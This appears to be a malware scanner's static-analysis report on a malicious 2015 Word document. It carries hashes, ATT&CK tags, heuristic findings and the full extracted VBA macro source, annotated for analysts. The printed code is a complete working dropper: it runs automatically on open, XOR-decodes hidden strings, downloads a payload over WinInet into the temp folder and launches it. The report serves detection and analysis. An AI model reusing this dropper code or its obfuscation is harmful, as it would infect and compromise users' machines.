Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b4470a74c0743833…

MALICIOUS

Office (OLE)

65.5 KB Created: 2015-01-19 16:07:00 Authoring application: Microsoft Office Word First seen: 2015-04-05
MD5: c9b7e099581eedfe55f8229b268ca380 SHA-1: d4b8b6be2980a01310f184c1a5ca38066ac3aa36 SHA-256: b4470a74c07438336eee8450a839410971570aeb57334d19e7053a31c459d3a2
88 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by the OLE_VBA_MACROS and OLE_LEGACY_WORDBASIC_AUTOEXEC heuristics. An autoopen macro is present, suggesting an attempt to execute code automatically when the document is opened. The CreateObject call heuristic further supports the execution of potentially malicious functionality. The primary purpose of the VBA script appears to be code execution via the autoopen macro, most likely to download and execute a secondary payload.

Heuristics 4

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set HAZ82769 = CreateObject _
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7194 bytes
SHA-256: df60e18e82b67227a4a3edfe018055c3dd3bbab47a09b6ce8036ba614bed2ff2
Preview script
First 1,000 lines of the extracted script
' Exported-module attributes for the document class module (ThisDocument).
' VB_PredeclaredId/VB_Exposed = True is normal for a document module; the only
' code it carries is the autoopen entry point below.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Word auto-execution entry point: runs when the document is opened
' (OLE_VBA_AUTOOPEN / T1059.005). It only delegates to HAZ82771 (Module4),
' which in turn calls HONOOROA (Module5), where the real logic lives.
Sub autoopen()
HAZ82771
End Sub

Attribute VB_Name = "Module4"
' Obfuscated string constants. Each hex blob is XOR-decoded at runtime by
' STOP7777777777 (Module6) with HAZ82772 as the repeating key; the plaintext
' never appears in the file, so decode the constants before using them as IoCs.
'*3
' Longest blob; it is the first argument to SOLOMKA110 (the WinInet downloader)
' in HONOOROA, i.e. the payload download URL. Not decoded here -- run it through
' the decoder to recover the URL.
Public Const HAZ82774 = "29383F347962621B18121C067A73627A747B637C191B055F56222F637A766D28354C"
'*4
' Hand-decoded (verify with the decoder) to the ProgID "Scripting.FileSystemObject";
' passed to CreateObject in HONOOROA.
Public Const HAZ82773 = "122F392D333924474F04745E27241F3237372820664A4057543F"
'*5
' XOR key shared by every encoded constant in this project. The decoder uses
' key character ((i Mod Len(key)) + 1) for blob byte i, so rotation starts at "A".
Public Const HAZ82772 = "KALKDCMM)(*27"

' Second hop of the call chain (autoopen -> HAZ82771 -> HONOOROA); pure
' indirection, presumably to keep the auto-exec stub free of suspicious calls.
Sub HAZ82771()
HONOOROA
End Sub








Attribute VB_Name = "Module11"
' More XOR-encoded constants for STOP7777777777 (key = HAZ82772, Module4).
'* 1
' Hand-decoded (verify) to the ProgID "Shell.Application"; HONOOROA uses the
' resulting object's .Open method to launch the dropped file.
Public Const HAZ82776 = "12242E282F630C5958465B542A3525242A"

'*2
' Appended to the temp-folder path in HONOOROA to form the drop path. Hand-decoded
' (verify) to a leading backslash followed by an .exe file name -- a host IoC once
' confirmed with the decoder.
Public Const HAZ82775 = "1D3F222F3324291B06181C0F6524342E"

Attribute VB_Name = "Module1"
' (File name: AddNewSheet.bas)
' Author: SENOO, Ken
' LICENSE: CC0
' (Last update: 2015-03-10T18:38+09:00)

' Filler/decoy: a public-domain Excel helper (see the CC0 header above) that
' deletes any worksheet named sheet_name and adds a fresh one. It is not
' referenced anywhere in this extracted listing, and Worksheets/Sheets/
' ActiveSheet belong to the Excel object model rather than Word, so it would
' fail if called from this document -- likely included to look benign.
Sub AddNewSheet(sheet_name)

' (original comment garbled in extraction) Remove an existing sheet with the
' same name, silencing the confirmation prompt while doing so.
For Each ws In Worksheets
  If ws.Name = sheet_name Then
    Application.DisplayAlerts = False
    ws.Delete
    Application.DisplayAlerts = True
  End If
Next ws

' (original comment garbled in extraction) Add a new sheet after the active one
' and give it the requested name.
Sheets.Add(After:=ActiveSheet).Name = sheet_name

End Sub

' UserForm module "UFO": attributes only, no code follows in the extracted
' listing. Empty forms like this are common padding in macro droppers.
Attribute VB_Name = "UFO"
Attribute VB_Base = "0{B38DC10C-7705-48DF-B89A-A48AE8E47EB0}{E5DDB61F-038E-4219-9BB8-7A0DACA6665F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Class module "Class1": attributes only, no members in the extracted listing.
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module3"
Option Explicit


' Read-buffer size in bytes for each InternetReadFile call in SOLOMKA110.
Private Const KAIIOOOO872 = 8162
' Passed as sAgent to InternetOpenA, so the download's HTTP User-Agent header is
' literally "KAIIOOOO871" -- a usable network detection string for this sample.
Private Const KAIIOOOO871 As String = "KAIIOOOO871"
' lAccessType for InternetOpenA; 1 is INTERNET_OPEN_TYPE_DIRECT (no proxy).
Private Const KAIIOOOO999 = 1
' dwFlags for InternetOpenUrlA; &H4000000 corresponds to INTERNET_FLAG_NO_CACHE_WRITE,
' i.e. the response is not written to the WinInet cache (fewer forensic traces).
Private Const cCCc = &H4000000
' Downloader: fetches sURL through WinInet and writes the response body to
' sFileName. Returns True only if at least one byte was accumulated (dData <> 0);
' the caller in HONOOROA ignores the result.
' Detection notes: User-Agent "KAIIOOOO871" (KAIIOOOO871 -> InternetOpenA),
' dwFlags &H4000000 on InternetOpenUrlA, file written via VBA Open/Put.
Public Function SOLOMKA110(ByVal sURL As String, ByVal sFileName As String) As Boolean
    #If VBA7 And Win64 Then
        ' WinInet session handle and URL handle (LongPtr on 64-bit VBA7).
        Dim HCDNNNDCNNDC2 As LongPtr, KAIIOOOO873 As LongPtr
    #Else
        Dim HCDNNNDCNNDC2 As Long, KAIIOOOO873 As Long
    #End If
    ' CDSFDFD: bytes returned by the most recent InternetReadFile call.
    Dim CDSFDFD As Long
    ' HCDNNNDCNNDC: fixed-length 8162-char read buffer; KAIIOOOO874: accumulated body.
    Dim HCDNNNDCNNDC As String * KAIIOOOO872, KAIIOOOO874 As String
    ' VVzzVz: VBA file number; dData: length of the downloaded body (0 means failure).
    Dim VVzzVz As Integer, dData As Double
    ' InternetOpenA(agent = "KAIIOOOO871", access type 1, no proxy, flags 0).
    HCDNNNDCNNDC2 = SOLOMKA110222(KAIIOOOO871, KAIIOOOO999, vbNullString, vbNullString, 0)
    If HCDNNNDCNNDC2 = 0 Then
        Exit Function
    End If
    ' InternetOpenUrlA(session, sURL, no extra headers, dwFlags = &H4000000).
    KAIIOOOO873 = SOLOMKA1102(HCDNNNDCNNDC2, sURL, vbNullString, 0, cCCc, 0)
    If KAIIOOOO873 = 0 Then
        dData = 0
    Else
        ' First InternetReadFile. The whole fixed-length buffer (not just CDSFDFD
        ' bytes) is copied, so the first chunk written appears to always be 8162
        ' bytes regardless of how many were actually read.
        KOOOODAAAAA1 KAIIOOOO873, HCDNNNDCNNDC, KAIIOOOO872, CDSFDFD
        KAIIOOOO874 = HCDNNNDCNNDC
        ' Keep reading until InternetReadFile reports 0 bytes.
        Do While CDSFDFD <> 0
            KOOOODAAAAA1 KAIIOOOO873, HCDNNNDCNNDC, KAIIOOOO872, CDSFDFD
            
            ' Junk loop (0 To 0, the inner condition is never true): dead code
            ' inserted for obfuscation, same pattern as in HONOOROA.
            Dim HhhhhHHuuU73772 As Integer
For HhhhhHHuuU73772 = 0 To 0
If HhhhhHHuuU73772 = 5 Then End
Next HhhhhHHuuU73772
            
            ' Append only the bytes actually read this iteration.
            KAIIOOOO874 = KAIIOOOO874 + Mid(HCDNNNDCNNDC, 1, CDSFDFD)
        Loop
        ' Write the accumulated body to sFileName in binary mode.
        dData = Len(KAIIOOOO874): VVzzVz = FreeFile
        Open sFileName For Binary Access Write Lock Write As #VVzzVz
        Put #VVzzVz, , KAIIOOOO874: Close #VVzzVz
    End If
    ' InternetCloseHandle on the URL handle, then the session handle.
    SOLOMKA1102222 KAIIOOOO873
    SOLOMKA1102222 HCDNNNDCNNDC2
    ' Clear the in-memory copy of the body.
    KAIIOOOO874 = ""
    If dData Then
        SOLOMKA110 = True
    End If
End Function

Attribute VB_Name = "Module2"
' WinInet imports under meaningless names. The Alias clauses carry the real API
' names (InternetOpenA, InternetOpenUrlA, InternetReadFile, InternetCloseHandle),
' which is what a detection rule should key on, not the local identifiers.
' Both branches declare the same four functions; only the handle type differs.

#If VBA7 And Win64 Then
' InternetCloseHandle -- note hInet is ByRef, unlike the other handle parameters.
Public Declare PtrSafe Function SOLOMKA1102222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
' InternetOpenA -- sAgent becomes the HTTP User-Agent ("KAIIOOOO871" from Module3).
Public Declare PtrSafe Function SOLOMKA110222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
' InternetReadFile -- fills the fixed-length buffer, reports bytes read in lNumberOfBytesRead.
Public Declare PtrSafe Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As LongPtr, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
' InternetOpenUrlA -- opens the payload URL; dwFlags is &H4000000 at the call site.
Public Declare PtrSafe Function SOLOMKA1102 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
' 32-bit / pre-VBA7 equivalents of the four declarations above.
Public Declare Function SOLOMKA1102222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Public Declare Function SOLOMKA110222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Public Declare Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As Long, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare Function SOLOMKA1102 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If



Attribute VB_Name = "Module5"


' Main dropper routine (autoopen -> HAZ82771 -> HONOOROA). Sequence visible here:
'   decode ProgID -> Scripting.FileSystemObject -> GetSpecialFolder(2) (temp folder)
'   -> build drop path -> delete stale copy -> SOLOMKA110 downloads the payload
'   -> Shell.Application .Open launches it.
' Module5 has no Option Explicit, so HAZ82767, SSSS and SASASA are implicit Variants.
' The repeated "For x = 0 To 0 / If x = 5 Then End" loops can never trigger; they
' are junk inserted to pad the code and frustrate signature matching.
' The line continuations splitting "Sub", "Dim", "CreateObject" and "FileExists"
' across lines serve the same purpose -- single-line greps miss them.
Sub _
HONOOROA()
'* cASCAccaCACA
' Will hold the Scripting.FileSystemObject instance.
Dim _
HAZ82769
Dim SiCoUnT As Integer

' Junk loop: assigns SiCoUnT four times; the value is never read.
Dim VgdgHH333jKKkllKAHNXNHHGDG87293 As Long
For VgdgHH333jKKkllKAHNXNHHGDG87293 = 17 To 20
SiCoUnT = VgdgHH333jKKkllKAHNXNHHGDG87293 + 1
Next VgdgHH333jKKkllKAHNXNHHGDG87293

' CreateObject(decode(HAZ82773)) -> "Scripting.FileSystemObject" (hand-decoded, see Module4).
Set HAZ82769 = CreateObject _
(STOP7777777777 _
(HAZ82772, HAZ82773))
Dim HAZ82768
' FileSystemObject.GetSpecialFolder(2) is TemporaryFolder (the user's %TEMP%).
Const HAZ82768ID = 2
Dim JHAIICENAU019 As Integer
For JHAIICENAU019 = 0 To 0
If JHAIICENAU019 = 5 Then End
Next JHAIICENAU019
Set HAZ82768 = HAZ82769.GetSpecialFolder _
(HAZ82768ID)
Dim chdhai93 As Integer
For chdhai93 = 0 To 0
If chdhai93 = 5 Then End
Next chdhai93
' Drop path = <temp folder> & decode(HAZ82775) (Module11). The Folder object is
' used in string concatenation, so presumably its default property (Path) applies.
HAZ82767 = HAZ82768 & STOP7777777777 _
(HAZ82772, HAZ82775)
Dim hiaopen847 As Integer
For hiaopen847 = 0 To 0
If hiaopen847 = 5 Then End
Next hiaopen847
' Re-creates the same FileSystemObject; redundant.
Set HAZ82769 = CreateObject _
(STOP7777777777 _
(HAZ82772, HAZ82773))
Dim BnBnHgs346 As Integer
For BnBnHgs346 = 0 To 0
If BnBnHgs346 = 5 Then End
Next BnBnHgs346
' Remove any previous copy of the payload before downloading.
If HAZ82769.FileExists _
(HAZ82767) Then
HAZ82769. _
DeleteFile HAZ82767
End If
' Download: decode(HAZ82774) is the URL, HAZ82767 the destination. The return
' value is ignored (empty If body), so the launch below runs even on failure.
If SOLOMKA110(STOP7777777777 _
(HAZ82772, HAZ82774), HAZ82767) Then
End If
' No-op: SSSS was never assigned.
Set SSSS = Nothing
' Existence check with an empty body; no effect.
If HAZ82769. _
FileExists _
(HAZ82767) Then
End If
' CreateObject(decode(HAZ82776)) -> "Shell.Application" (hand-decoded, Module11).
' .Open on the dropped path executes the downloaded file via the shell.
Set SASASA = CreateObject _
(STOP7777777777 _
(HAZ82772, HAZ82776))
SASASA.Open HAZ82767
End Sub

Attribute VB_Name = "Module6"
Option Explicit

' XOR string decoder for the hex blobs in Module4 and Module11.
' STOP777777777 is the key (HAZ82772 at every call site); STOP77777777 is the
' hex-encoded ciphertext. Blob byte i (1-based) is XORed with key character
' ((i Mod Len(key)) + 1), so the key rotation starts at the key's 2nd character.
' Returns the decoded plaintext. Re-implementing these few lines offline is the
' quickest way to recover the URL and ProgIDs from the constants.
Public Function STOP7777777777(STOP777777777 As String, STOP77777777 As String) As String
    Dim asasas1 As Long
    Dim asasas1O As String
    Dim asasas10 As Integer
    Dim asasas101 As Integer
    ' One iteration per hex byte pair.
    For asasas1 = 1 To (Len(STOP77777777) / 2)
        ' Hex pair -> byte value.
        asasas10 = Val("&H" & (Mid$(STOP77777777, (2 * asasas1) - 1, 2)))
        ' Rotating key byte.
        asasas101 = Asc(Mid$(STOP777777777, ((asasas1 Mod Len(STOP777777777)) + 1), 1))
        asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
    Next asasas1
   STOP7777777777 = asasas1O
End Function